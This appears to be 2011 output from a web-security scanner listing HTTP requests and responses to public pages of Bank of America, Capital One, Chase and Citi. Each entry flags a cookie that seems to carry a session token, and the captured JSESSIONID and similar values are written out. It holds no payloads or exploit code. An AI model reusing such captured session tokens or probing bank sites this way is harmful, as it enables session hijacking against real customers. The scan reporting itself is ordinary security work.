GET /retirementcenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/Search.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Location: https://www6.bankofamerica.com/search/Search.do Content-language: en-US Set-cookie: JSESSIONID=0000d7-ksy874kdblG0_pEKtKn2:13ihk3qeh; Path=/ Set-cookie: INTL_LANG=en_US Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/sitemap/index.jsp Content-language: en-US Set-cookie: JSESSIONID=0000AHYKHX5RDNXbJ74F_kN_fGy:12qb4k2ev; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:13 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:29 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=00001dmfVt102GWARUceA1dBtn0:12qb4k7c1; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:28 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descript ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /about/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1p8qNJWYfWB5ZkwnxDLZnjSHsp1RWFYccXhcpFpZ4PHTpW00Lg88!1025162061; path=/ Set-Cookie: Corporate=6d2bccf6cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCo8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS06NMzQwgKj3zENTDAA%3D; domain=.capitalone.com; expires=Saturday, 30-Jan-2021 22:12:40 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 55757
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Explore the history and culture of one of America's ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 59681
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse our small business banking products includin ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/business-money-market/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:00 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=cgfmNJWQcJvjTlBLWy8QTQF18zjDLG9y6zLG2jyvTXxr2jFQ7lYV!-1710325866; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDU0MDhDdmtVV0dvb0VzajAvTTlLUXNyc1pnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 60850
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/cards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:53 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=XLwQNJWJ5GYGgnZ0NkdH6V6RyJygf7d1Bh1GGL0MF5G5nX3rNBYX!-201819150; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTExMDJialJRVlVqUDEwS3ZWOXRwQytlYytRPT0=; expires=Tuesday, 21-Feb-2079 01:26:00 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:53 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/cards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:57 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=FbpnNJWNTkZPPVyCtR9T3vhQFrHc45TyPPQ2LmGLKGmK8b3yr5XQ!1025162061; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDR1bFp4Rmh3TlZLcVFyL2JUZVJYcE9nPT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/payroll/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1LyBNJWTQDvpxXPth7p4yrMGr417XqLXvtLTJNWJDPZwntqtXcTX!-1660665105; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxMzk3OTRxNlVsM2hObzczWFlhQ2ZPV01ZajF3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 49209
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MilitaryLendingProgram HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Thu, 03 Feb 2011 01:06:32 GMT Content-type: text/html CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ccpmweb/chf/document/militarylendingrogram.html Set-Cookie: DCTMSESSION=pWqKNJ1Yv9NlgJ9kghvXKyZLpQVVXTgYyKD5x51HXqvvslJM3G4x!-661114096; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.chase.com/ccpmweb/chf/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccp/index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=JWTFNJXGmZr1X2nwQZHwnnLjtkzTGpQJ5DHvfJ94f6GFQqG4Qgyv!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chf/mortgage/om_chasecom_redirect HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:35 GMT Content-length: 959 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Set-Cookie: DCTMSESSION=ShdXNJXDQb0ZFHj1qGKczSFvgTsznLZk7Y4h2czW2Hy7tvLD7KtZ!1262409899; path=/ Connection: close
<html LANG="EN" > <head> <META NAME="robots" CONTENT="index,follow"/> <title >Chase</title> </head> <body><script language="JavaScript"> var s_pageName="Homeownership Center - Obama March 4th - chase ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skeletons/psmgenskel HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=TGFhNJXG71xk8S9N20Cn9bvPGH9yrm34fvpzv4HJ4vS1Qd9YSb6M!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=m6CMNJXFZC8PjQQGMf6sxvPhwgmTfjK0RYFv4QFJyyLQsBjXGn1m!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin/images HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=6g6NNJXFxLM7k3X2S2lR1bkgB1YqhbvphnpHhSMxkgVP6SXmGTFQ!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=jfkfNJXCyH5XHZVYYRdMBh3DlcZvv0J0RGw0MtqzPlxX9TQR6Xvp!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/logon/on_successful_logon.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: http://www.chase.com/cm/cs?urlname=shared/crb/page/notfound.jsp Set-Cookie: DCTMSESSION=NKdvNJXCtfpNBvzYPBCnfP7wBLN2Mt3mCwB2QVmpcRW091j5sTGT!-1658401948; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <bo ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /domain/index.jsp HTTP/1.1 Host: www.citi.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /domain/scripts/config.jsp HTTP/1.1 Host: www.citi.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mobiledetect=false; JSESSIONID=R5X5NJTZ3ppnyZvlWDvGgDyfTxKqVG2Q4SL8xGJkwfC4xZlJ8Sds!-455328445
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 21:59:54 GMT Content-length: 167 Content-type: text/javascript; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; path=/ Connection: close
var CITI_ENV = 'http://www.citi.com'; var JFPDOMAIN = 'https://online.citibank.com'; var PGI = 'citi.bridgetrack.com'; var BVE = '.'; var HBX = 'DM550608DPBR';
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/advanced.jsp HTTP/1.1 Host: www.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:16:52 GMT Content-length: 9862 Content-type: text/html; charset=iso-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=J2p2NJXJWGcFrv05jcRLtCqdJlQJnBG9XFdLpDVyyTrCS2RvLqzq!187799042; path=/ Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/results.jsp HTTP/1.1 Host: www.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;
Response
HTTP/1.1 302 Moved Temporarily Server: "" Date: Wed, 02 Feb 2011 22:16:52 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Location: http://www.citi.com/search/search.jsp Set-Cookie: JSESSIONID=lFNyNJXJGtNdT2dBy6yQNSS22B51L6JfWN1bPnvznz3J1M5fnHhp!187799042; path=/ Connection: close
